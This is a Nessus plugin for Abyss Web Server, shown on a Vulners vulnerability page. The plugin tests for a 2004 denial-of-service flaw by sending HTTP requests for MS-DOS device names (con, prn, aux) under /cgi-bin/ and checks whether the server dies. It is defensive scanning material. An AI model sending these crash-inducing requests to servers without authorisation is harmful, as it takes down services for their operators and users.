Lucene search
+L

Abyss Web Server MS-DOS Device Name DoS

🗓️ 25 Oct 2004 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 57 Views

Abyss Web Server can be crashed by sending an MS-DOS device name in an HTTP request.

Refs
Code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(15563);
 script_version("1.19");

 script_xref(name:"Secunia", value:"12900");

 script_name(english:"Abyss Web Server MS-DOS Device Name DoS");
 script_summary(english:"Try to pass an MS-DOS device name to crash the remote web server");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a remote denial of service
vulnerability.");
 script_set_attribute(attribute:"description", value:
"It was possible to kill the web server by sending an MS-DOS device
name in an HTTP request.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/vulnwatch/2004/q4/13");
 script_set_attribute(attribute:"solution", value:
"Upgrade to version 1.2.3.0 or higher.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 
 script_set_attribute(attribute:"plugin_publication_date", value: "2004/10/25");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/10/20");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2004-2020 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");

 script_dependencies("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

########

include("global_settings.inc");
include("http_func.inc");

port = get_http_port(default:80, embedded:TRUE);
if (! get_port_state(port)) exit(0, "TCP port "+port+" is closed.");

if (report_paranoia < 2)
{
  banner = get_http_banner(port:port);
  if ( ! banner)
     exit(1, "No web banner on port "+port+".");
  if ("Abyss/" >!< banner )
    exit(0, "The web server on port "+port+" is not Abyss.");
}
if (http_is_dead(port:port))
  exit(1, "The web server on port "+port+" is already dead.");

function check(pt,dev)
{
  local_var r, req, soc;
  req = string("GET /cgi-bin/",dev," HTTP/1.0\r\n\r\n");
  soc = http_open_socket(pt);
  if(! soc) exit(1, "TCP connection failed to port "+port+".");

  send(socket:soc, data: req);
  r = http_recv(socket:soc);
  http_close_socket(soc);

  if(http_is_dead(port: pt)) { security_hole(pt); exit(0);}
}

dev_name=make_list("con","prn","aux");
foreach devname (dev_name)
{
  check(pt:port, dev:devname);
}
exit(0, "The web server on port "+port+" is not vulnerable.");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jun 2020 00:00Current
5.4Medium risk
Vulners AI Score5.4
57